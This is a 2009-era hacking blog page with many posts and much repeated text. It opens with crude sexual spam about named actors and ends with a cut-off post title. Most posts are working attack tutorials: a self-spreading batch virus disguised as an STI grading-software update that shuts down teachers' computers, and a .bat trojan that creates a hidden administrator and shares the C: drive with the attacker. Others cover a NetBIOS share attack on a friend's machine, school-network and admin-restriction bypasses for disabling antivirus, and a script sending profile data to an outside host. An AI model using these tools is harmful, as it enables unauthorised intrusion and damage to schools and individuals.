In Dostana John use a condom to fuck Priyanka Chopra.
And Bachan seeing her ash.
Let's Enjoy It is a2z-films exclusive.
And Bachan seeing her ash.
Let's Enjoy It is a2z-films exclusive.
John use a condom to fuck Priyanka Chopra
Posted by Sayantan March 31, 2009 2:48 AM 0 commentsAdvanced Rapid Share Hack
Posted by Sayantan 2:47 AM 0 commentsWe all know that getting a new IP address from ISP allows us to download the next file from RapidShare. I bet many of us know this concept long ago but there wasn’t any program that can do this. Now, here is a program called Cryptload that is able to download the first file automatically without you entering the CAPTCHA code, and when it finished downloading, it will try to download the second file. Once it detects “You have reached the download-limit for free-users” message from RapidShare, it’ll disconnect and reconnect your Internet to get a new IP address. Then it’ll continue downloading the second file. All this is done automatically and you only need to add the RapidShare links to Cryptload. How easy is that?
But before you get to automate RapidShare downloading, I’ll show you what you need to do because I was stuck for a few days on Cryptload with some problems. 
Most important setting that you must get it right is the Router section. Other than that, there is nothing else you need to configure in Cryptload. You can access Cryptload options by clicking the top right button that looks like this. Click on the Router button to configure your router settings. If you are using a modem to connect to the internet, select the Modem button. How do you know if you’re using a modem or router? If you need to dial up to the Internet like the below image, then you’re using a modem.
If your internet automatically when you turn on the power for the small box, then it’s a router. So if you are using a router, click on the dropbox and search for your router model in the list.
Here are the settings you must configure correctly.
IP Address: The IP Address of your router. To know your router’s IP address, run command prompt, type ipconfig and the Default Gateway is your router’s IP address.
Username and Password: The username and password used to login to your router. Please check your router’s manual if you don’t know the default login data.
Waittime after reconnect in sec: This is the time that it’ll wait to download the next RapidShare file after Cryptload tries to reconnect to the Internet. It depends on your ISP. Some might take longer to reconnect. Try 15 seconds first and if your Internet doesn’t gets connected before 15 seconds, increase it to 30 seconds and so on…
Now you can use Cryptload to automate RapidShare downloading. Here is how I do it.
1. Collect all RapidShare links that I want to download and paste them into a text file.
2. Run Cryptload
3. On the text file, press CTRL+A to select all, and then press CTRL+C. Link collector will appear and it will automatically decrypt the links.
4. Press Add button and press OK at Package settings. You can change the downloaded files location if you want.
What if your router’s model is not in the list?
Not to worry at all because the people who created Cryptload are very nice people and they are very willing to help you to create CLR file to support your router. Here’s what you need to do.
1. Install Live HTTP Headers extension for your Firefox browser.
2. Run Firefox, go to Tools -> Live HTTP Headers. Make sure capture checkbox is checked.
3. Go to Firefox window, login to your router, manually disconnect and then reconnect to the internet.
4. Go back to the Live HTTP headers, click Save all button and save it as router.txt
5. Click close to close Live HTTP headers.
6. Go to www.nopaste.com, enter your name in Nick, Description as your router brand with model and firmware version if possible. Make sure Plain is selected for language. Click on the Browse button and look for the router.txt file. Finally click Paste.
7. Wait for a few seconds, and you’ll be forwarded to a new page with the URL something like http://nopaste.com/p/xXXxxXxxX.
8. Go to www.cryptload.info website, at Live-Support, enter your username (your name), E-mail and click Los button. If cryptload staff is available, you can give them the nopaste URL to create your router’s CLR file. If not, you can fill up the form to send an email to them. I am sure they’ll get back to you with your CLR file.
Another way is to join Cryptload IRC channel and try getting help there. The person that patiently helped me from the beginning till the end was Apokalypser.
IRC Server: irc.german-elite.net
Channel: #cryptload
Once you got the CLR file from Cryptload staff, copy it to Cryptload’s router folder and it’ll be included in the router list when you run Cryptload the next time. Cryptload is a perfect way to unlimited rapidshare downloading. Well, only perfect for those with dynamic IP address. It is developed by shira, bocka and apokalypser. For those with static IP adress Rapid GraB may be the best way for you. NOTE: Cryptload requires at least Microsoft .NET Framework v2.0 and above. [ Download Cryptload | Cryptload Website ]
Orkut Themes
Posted by Sayantan 2:46 AM 0 commentsA lot of you people must use orkut and must be wondering how to change the default boring orkut theme. Well, your search is over. I have personally made 20 brand new orkut themes that you wont find anywhere else on the net. Everything from NBA to Cricket to Firefox to Katrina Kaif! 
I would like to point out though, that these orkut themes will only be shown to yourself when YOU are browsing orkut. So lets get started. First I will list the requirements that you need to fulfill in order to install these orkut themes.
Installation Procedure for these Orkut Themes
Once you have installed mozilla firefox and the greasemonkey addon then all you need to do is install any one of the following orkut themes. Below every theme image is a link to the script for that specific orkut theme. Just click on any one and you will be prompted to install it. Click install and it will be installed in a jiffy! You can then go to browse orkut with your new theme. If you want to change a theme then you will first install the new theme from this page. Then you have to right-click on the little “monkey” face in the status bar below. From there, you will see a list of your installed scripts which will have the different orkut themes. Just uncheck any theme you do not want to use and check any orkut theme that you do want to use. Its just that simple!
Uninstall Procedure for these Orkut Themes
If you want to completely remove any of these orkut themes then right-click the monkey face and click Manage User Scripts. You will see a list of your installed scripts. Just select any script that you want to remove and click the Uninstall button at the bottom. Its just that simple!
Note: Click image to see a higher resolution image of that orkut theme
Orkut Themes
Aishwarya Rai Orkut Themes
To download this orkut theme, click here.
To download this orkut theme, click here.
Bleach Orkut Theme
To download this orkut theme, click here.
Christiano Ronaldo Orkut Theme
To download this orkut theme, click here.
David Beckham Orkut Theme
To download this orkut theme, click here.
Dhoni Orkut Theme
To download this orkut theme, click here.
Firfox Orkut Theme
To download this orkut theme, click here.
Dragonball Z Orkut Theme
To download this orkut theme, click here.
Halo 3 Orkut Theme
To download this orkut theme, click here.
Kareen Kapoor Orkut Themes
To download this orkut theme, click here.
To download this orkut theme, click here.
Katrina Kaif Orkut Theme
To download this orkut theme, click here.
Naruto Orkut Theme
To download this orkut theme, click here.
NBA Orkut Theme
To download this orkut theme, click here.
Ronaldinho Orkut Theme
To download this orkut theme, click here.
Sachin Tendulkar Orkut Theme
To download this orkut theme, click here.
Salman Khan Orkut Themes
To download this orkut theme, click here.
To download this orkut theme, click here.
Shahrukh Khan Orkut Theme
To download this orkut theme, click here.
Spiderman Orkut Theme
To download this orkut theme, click here.
Emma Watson Theme
Download this theme from here.
SRK Theme
Download this theme from here.
Daniel Radcliffe Theme
Download this theme from here.
Firefox Theme
Download this theme from here.
Skull Theme
Download this theme from here.
NBA Theme
Download this theme from here.
Puppy Theme
Download this theme from here.
City Life Theme
Download this theme from here.
Note: We have noticed that orkut recently happened to change some of their codes, so the themes are not loading for a few orkut profiles. We recommend you to try loading the themes and if it doesnt do anything even after waiting for a few minutes, we are sorry to say that your profile belongs to those few orkut profiles. Anyways, we are working 24/7 to get the themes to work for every orkut user.
How to change orkut themes :
- Copy the code below the theme you like (RightClick + Select Copy)
- Goto your orkut profile page
- Paste the code into the Address bar of YOUR ORKUT PROFILE PAGE (where you type www.orkut.com, google.com etc.)
- Wait for a few mins. for the theme to load
-
|
Drona Copy the below code.
|
James Bond Copy the below code.
|
Bachna Ae Haseeno Copy the below code.
|
Batman Copy the below code by selecting it and pressing Ctrl+C or right-click and select Copy.
|
Jaane Tu Ya Jaane Na Copy the below code by selecting it and pressing Ctrl+C or right-click and select Copy.
|
Batman - Dark Knight Copy the below code.
|
Singh is Kinng Copy the below code.
|
Phoonk Copy the below code.
|
Pirate Skull Copy the below code.
|
John Abraham Copy the below code.
|
Triple H Copy the below code.
|
Cartoon Copy the below code.
|
Naruto Copy the below code.
|
HellBoy Copy the below code.
|
Shut Down Your School
Posted by Sayantan 2:45 AM 0 comments
This article is for only educational purpose, i am not responsible for any misuse of this article.
By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
View Locked Scrapbook
Posted by Sayantan 2:45 AM 0 comments
This is a very useful trick when somebody has locked his/her scrapbook to be viewed by others.
How To Use this Hack?
There are three ways to use this hack.You can choose the one that best suits you.
a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook.
or
b> Using this Javascript :
* Navigate to the profile which has disallowed non-friends to view his/her scrapbook
* Run this script in the address bar
*javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+encodeURIComponent(location.href);void(0)
* Wait for 4-5 seconds and you will get to see the scraps.
or
c> Userscript (Credits - D3 ) -
The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below:
* Install Grease Monkey in case you don’t have it - Click Here
* Install View Locked Scrapbook Script
* In case you have any problems downloading or operating these scripts, you must read this tutorial.
How To Use this Hack?
There are three ways to use this hack.You can choose the one that best suits you.
a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook.
or
b> Using this Javascript :
* Navigate to the profile which has disallowed non-friends to view his/her scrapbook
* Run this script in the address bar
*javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+encodeURIComponent(location.href);void(0)
* Wait for 4-5 seconds and you will get to see the scraps.
or
c> Userscript (Credits - D3 ) -
The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below:
* Install Grease Monkey in case you don’t have it - Click Here
* Install View Locked Scrapbook Script
* In case you have any problems downloading or operating these scripts, you must read this tutorial.
Making your own trojan in a .bat file
Posted by Sayantan 2:43 AM 0 comments
Search 1.6 million Jobs
Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Net BIOS attack
Posted by Sayantan 2:42 AM 0 comments
So NetBIOS is the first thing when you want to root to learn. In my article i will considerate that my target don”t have password protected the files, shared files.
Tools:
Windows target and attacker(i don”t know if this attack work on Linux or other os)
First we need to choose a target we will consider our target to be a friend from the same LAN who own BOX666
Step 1:
open cmd
start->run->cmd->enter
Step 2:
Now we need to gather info about our target BOX666 to do this we will do a net view command
c:>net view
We do this to see all computers from our LAN
Without scanning the host for open ports we can see if our target is vulnerable to NetBIOS attack and have Printer and Files Sharing activate. We use the nbtstat command. but we need the ip address not the box name so we will ping our target
c:>ping BOX666
After the pinging process end we have our target ip let’s say 1.1.1.1
Now we can use nbtstat command
c:>nbtstat -A 1.1.1.1
Now we get a list of some starnge data all what we are looking for is this:
<20>
This is a hex number who tell us that the BOX666 is vulnerable. Now we need to connect to target but if we connect what we can take. To gather information about shared files on BOX666 we use net view command
c:>net view 1.1.1.1
Now we have a list of shared files. Sometimes stupid users share a full partition or all partitions even the one where Windows is installed >:)
Step 3:
Now let’’s connect using net use command
c:\>net use x: \\1.1.1.1shared_item
With this command we have created an network driver. To download data, upload data you can use cmd or windows explorer(recommended)
Step 4:
After you have done your job close the connection by using net use command
c:>net use x: /d
Now the network driver is gone
Congrats now you know how to do a NetBIOS Attack.
Tools:
Windows target and attacker(i don”t know if this attack work on Linux or other os)
First we need to choose a target we will consider our target to be a friend from the same LAN who own BOX666
Step 1:
open cmd
start->run->cmd->enter
Step 2:
Now we need to gather info about our target BOX666 to do this we will do a net view command
c:>net view
We do this to see all computers from our LAN
Without scanning the host for open ports we can see if our target is vulnerable to NetBIOS attack and have Printer and Files Sharing activate. We use the nbtstat command. but we need the ip address not the box name so we will ping our target
c:>ping BOX666
After the pinging process end we have our target ip let’s say 1.1.1.1
Now we can use nbtstat command
c:>nbtstat -A 1.1.1.1
Now we get a list of some starnge data all what we are looking for is this:
<20>
This is a hex number who tell us that the BOX666 is vulnerable. Now we need to connect to target but if we connect what we can take. To gather information about shared files on BOX666 we use net view command
c:>net view 1.1.1.1
Now we have a list of shared files. Sometimes stupid users share a full partition or all partitions even the one where Windows is installed >:)
Step 3:
Now let’’s connect using net use command
c:\>net use x: \\1.1.1.1shared_item
With this command we have created an network driver. To download data, upload data you can use cmd or windows explorer(recommended)
Step 4:
After you have done your job close the connection by using net use command
c:>net use x: /d
Now the network driver is gone
Congrats now you know how to do a NetBIOS Attack.
Hack School Network
Posted by Sayantan 2:40 AM 0 comments
How to become Admin on your school Network. This way works for most schools.
Howdy Everyone
This tutorial is for those newbies out there, wanting to “hack” their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.
Firstly get a feel for the layout of the network.. you can do this quickly by:
Start > Programs(Right Click) > Explore
this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…
The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.
So to get around this you can do two things:
1) input this into the IE address “C:windowssystem32cmd.exe”
however this is very likely to be disabled.
2) Creating a Bat file to open Command Prompt.
You can do this by, opening IE > view > source.
once you have notepad open, where gonna make a .BAT file
.
we want the BAT file to open up command prompt, so we type:
“CMD” without the “” press ENTER then save it as file.BAT.
Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.
So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.
Once we have it open now comes the good bit….
Before doing this, make sure you know a good lot of DOS commands.
Heres a great list www.computerhope.com/msdos
These are a few that you might like to try:
Net send * “Hungry Hacker is cool”
Shutdown -s -f -m &*92;NAME - rarely works
These will only work if you have the privilages to use them.
After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.
There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.
This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, - Now you have control over every computer!!
You could use the RAT to use the admins machine, here possibilites are endless!
Howdy Everyone
This tutorial is for those newbies out there, wanting to “hack” their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.
Firstly get a feel for the layout of the network.. you can do this quickly by:
Start > Programs(Right Click) > Explore
this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…
The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.
So to get around this you can do two things:
1) input this into the IE address “C:windowssystem32cmd.exe”
however this is very likely to be disabled.
2) Creating a Bat file to open Command Prompt.
You can do this by, opening IE > view > source.
once you have notepad open, where gonna make a .BAT file
.
we want the BAT file to open up command prompt, so we type:
“CMD” without the “” press ENTER then save it as file.BAT.
Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.
So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.
Once we have it open now comes the good bit….
Before doing this, make sure you know a good lot of DOS commands.
Heres a great list www.computerhope.com/msdos
These are a few that you might like to try:
Net send * “Hungry Hacker is cool”
Shutdown -s -f -m &*92;NAME - rarely works
These will only work if you have the privilages to use them.
After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.
There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.
This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, - Now you have control over every computer!!
You could use the RAT to use the admins machine, here possibilites are endless!
Breaking the Restrictions of the Administrator
Posted by Sayantan 2:39 AM 0 comments
Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 & Win XP.
This can be used to gain access to the website you want to for free, and how you can gain access to ‘control panel’, and the various other tools of Windows that may have been blocked from your grasp like ‘regedit’ by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that’s cool because now we can access ‘Internet options’,
click in the ‘connections’ tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.
Its only an ‘Unplugging technique’ to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u’re will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don’t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type “cacls” in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type “cacls /?” for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse’s mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra’s here, most of them left unknowing to the general public - such as, “Online Crash Analysis” - a site that looks like Windows Update but you can upload your crash “dump logs” (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).
Now lets c how to open restricted site on college servers
Hungry Hacker recommends : http://unblockall.net/
* Bypass any filters from work or school and access your favorite community and entertainment sites
* Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors
* Chat with your friends from work
* Watch videos on Youtube
* Login into Myspace, Facebook and all the popular community sites without losing the proxy
* No traffic redirection
* No PopUp and Annoying Ads!
To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.
PLEASE DROP IN YOUR COMMENTS BELOW
This can be used to gain access to the website you want to for free, and how you can gain access to ‘control panel’, and the various other tools of Windows that may have been blocked from your grasp like ‘regedit’ by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that’s cool because now we can access ‘Internet options’,
click in the ‘connections’ tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.
Its only an ‘Unplugging technique’ to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u’re will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don’t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type “cacls” in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type “cacls /?” for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse’s mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra’s here, most of them left unknowing to the general public - such as, “Online Crash Analysis” - a site that looks like Windows Update but you can upload your crash “dump logs” (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).
Now lets c how to open restricted site on college servers
Hungry Hacker recommends : http://unblockall.net/
* Bypass any filters from work or school and access your favorite community and entertainment sites
* Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors
* Chat with your friends from work
* Watch videos on Youtube
* Login into Myspace, Facebook and all the popular community sites without losing the proxy
* No traffic redirection
* No PopUp and Annoying Ads!
To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.
PLEASE DROP IN YOUR COMMENTS BELOW
Turn on pc in 10 seconds
Posted by Sayantan 2:38 AM 0 comments
So you want to know “How to turn the PC on in 10 seconds”. Alright here is what you have to do to turn on your PC in 10 seconds
* First click on the start button then press R it will take you to Run well go to run.
* Then type Regedit.
* Press Enter.
* This will open Registery Editor.
* Now look for the key.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
* Now there find the Key Called “Startup Delay”
* Double Click On It.
* Now where its Base.
* Click Decimal.
* Now its Default Value Is 4800000.
* Change The Value To 40000.
* Here you go. You have Done it
* Now close the Registery Editor and Restart Your Computer.
* You’ll See The Result.
Comments Appreciated
* First click on the start button then press R it will take you to Run well go to run.
* Then type Regedit.
* Press Enter.
* This will open Registery Editor.
* Now look for the key.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
* Now there find the Key Called “Startup Delay”
* Double Click On It.
* Now where its Base.
* Click Decimal.
* Now its Default Value Is 4800000.
* Change The Value To 40000.
* Here you go. You have Done it
* Now close the Registery Editor and Restart Your Computer.
* You’ll See The Result.
Comments Appreciated
Cracking .htaccess/.htpasswd for Passwords
Posted by Sayantan 2:37 AM 0 comments
